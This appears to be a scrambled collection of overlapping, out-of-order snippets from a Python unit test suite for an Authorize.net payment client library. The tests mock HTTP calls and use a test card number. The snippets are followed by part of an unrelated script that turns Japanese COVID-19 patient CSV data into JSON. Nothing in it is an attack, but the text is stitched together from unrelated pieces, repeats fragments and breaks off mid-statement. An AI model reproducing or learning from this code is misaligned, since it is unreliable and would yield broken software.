urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a':", "def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api =", "'911', 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip':", "mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import", "'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen):", "'CA', '90291') def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL)", "TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url,", "'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This transaction has been", "self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' ))", "urlopen.side_effect = self.success # Test without specified amount result =", "= self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC'", "'4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city':", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS)", "'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen')", "transaction_id, amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45 Rose Ave', 'Venice',", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success result =", "self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq(", "try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith(", "'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has", "Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return None", "'1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text':", "def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b':", "}) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, {", "ERROR self.year = date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year,", "urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect =", "'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This transaction has been", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success #", "( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS)", "self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This", "'x_zip': '90291', 'x_country': 'US', }) params = self.api._add_params( {}, credit_card=self.credit_card,", "'&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect =", "with specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only',", "isinstance(s, binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1,", "'20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction", "getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return None def get_content_charset(self,", "credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', })", "__init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS", "b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2',", "= self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "'90291') def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api", "= TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False)", "}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect = self.success result =", "with transaction_id, amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "} def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return s", "'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2',", "{ 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params =", "'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city': 'Venice',", "def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return s def", "specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape')", "version\"\"\" return None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3", "class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2", "urlopen.side_effect = self.success params = {'a': '1', 'b': '2'} result", "urlopen): urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0],", "MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;'", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success # Test", "'Venice', 'CA', '90291') def test_basic_api(self): api = TransactionAPI('123', '456') self.assertEqual(api.url,", ") )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect =", "PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount':", "'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response':", "urlopen.side_effect = self.success # Test with transaction_id, amount result =", "map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def", "urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect", "'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1',", "'response_reason_code': '1', 'response_reason_text': 'This transaction has been approved.', 'transaction_id': '2171062816',", "self.year, 1, '911') self.address = Address('45 Rose Ave', 'Venice', 'CA',", "{ 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip':", "import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class", "'This transaction has been approved.', 'transaction_id': '2171062816', } ERROR =", "date from six import BytesIO, binary_type, u from six.moves.urllib.parse import", "params2): _params1, _params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) ==", "# Test without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = {", "'1', 'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction", "2 version\"\"\" return None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success result =", "'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y',", "'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success #", "**kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0)", "TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect", "urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b': '2'}) except", "self.api = TransactionAPI('123', '456') self.success = lambda *args, **kwargs: SUCCESS.seek(0)", "IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self,", "test_capture(self, urlopen): urlopen.side_effect = self.success result = self.api.capture(20, self.credit_card, self.address)", "'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self,", "= self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' ))", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success # Test", "authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import Address, CreditCard", "'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has been", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a': '1',", "amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "'1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result,", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = self.success params = {'a':", "test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num':", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success", "self.error try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as e:", "'response_reason_code': '2', 'response_reason_text': 'This transaction has been declined.', 'transaction_id': '2171062816',", "test_auth(self, urlopen): urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card, self.address)", "'&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect =", "self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date':", "declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params =", "= IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "'911') self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291') def", "( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import Address, CreditCard from", "'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has been approved.',", "self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen):", "credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code':", "test_credit(self, urlopen): urlopen.side_effect = self.success # Test with transaction_id, amount", "Test with specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "transaction has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}),", "def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers()", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result,", "'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen):", "PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount':", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success", "'x_country': 'US', }) params = self.api._add_params( {}, credit_card=self.credit_card, address=self.address )", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success result", "= self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response':", "PARSED_SUCCESS) # Test with specified amount result = self.api.settle('123456', amount=10)", "self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;'", "import TestCase import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI", "'Y', 'response_reason_code': '1', 'response_reason_text': 'This transaction has been approved.', 'transaction_id':", "= MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;'", "declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response':", "'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code': '1', 'response_reason_text': 'This", "unittest2 import TestCase import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL,", "'&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount", "urlopen): urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0],", "10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' ))", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self, urlopen): urlopen.side_effect = self.success result = self.api.capture(20,", "def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1',", "self.assertTrue(str(e).startswith( 'This transaction has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def", "transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = {", "'2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text':", "self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID'", "== frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456')", "b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code':", "+ 10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address =", "return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api =", "'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N',", "'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params,", "{ 'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type':", "u from six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import TestCase", "= self.api._add_params( {}, credit_card=self.credit_card, address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111',", "_params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success", "= self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE'", "( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result,", "3 version\"\"\" return failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args,", "class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456') self.success =", "def test_settle(self, urlopen): urlopen.side_effect = self.success # Test without specified", "'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) params = self.api._add_params(", "result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result,", "datetime import date from six import BytesIO, binary_type, u from", "'b': '2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has", "'90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect =", "'456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL)", "= self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city':", "'456') self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error", "class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return", "Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api = TransactionAPI('123',", "self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error =", "\"\"\"Python 2 version\"\"\" return None def get_content_charset(self, failobj=None, *args, **kwargs):", "MockResponse( b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS", "specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "self.credit_card = CreditCard('4111111111111111', self.year, 1, '911') self.address = Address('45 Rose", "TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b':", "has been declined.' )) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {})", "'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) params" ]
[ "# 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt =", "'%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日 #", "inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) }", "datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt -", "open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row", "datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日", "1 datelist = [] for i in range(days_num): datelist.append(strdt +", "# 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as", "foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\":", "datelist.append(strdt + timedelta(days = i)) patients_summary_list = [] # 日付の新しい順に辿って小計が", "patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] #", "%H:%M') patients_list = [] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意", "in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue", "= [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader =", "開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num", "= patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False)", "in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算']", "# 引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\")", "patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args = sys.argv with", "0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1]", "'%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days", "date, time, timedelta # Japan Standard Time (UTC + 09:00)", "foundZero = True for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d')", "sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile)", "reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] })", "= sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader =", "else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\":", "in range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list = []", "{ \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" : { \"date\":", "datetime, date, time, timedelta # Japan Standard Time (UTC +", "'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row in", "{ \"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time,", "= False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": 